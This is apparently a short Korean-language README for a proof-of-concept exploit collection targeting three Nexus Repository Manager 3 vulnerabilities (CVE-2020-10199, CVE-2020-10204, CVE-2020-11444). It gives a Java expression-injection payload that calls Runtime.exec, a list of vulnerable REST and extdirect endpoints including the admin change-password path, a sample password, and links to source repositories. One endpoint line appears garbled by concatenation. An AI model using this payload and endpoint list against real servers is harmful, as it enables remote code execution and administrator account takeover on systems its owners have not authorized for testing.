
Nexus Repository Manager 3 취약점(CVE-2020-10199, CVE-2020-10204, CVE-2020-11444)을 위한 PoC 익스플로잇 모음으로, HTTP 엔드포인트를 통한 원격 코드 실행 및 권한 상승을 가능하게 합니다.

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}
/service/rest/beta/repositories/go/group
/service/extdirect
/service/rest/beta/repositories/apt/hosted
/service/extdirect/service/extdirect/service/rest/beta/security/users/admin/change-password
POST:
123456
https://www.cnblogs.com/magic-zero/p/12641068.html
https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus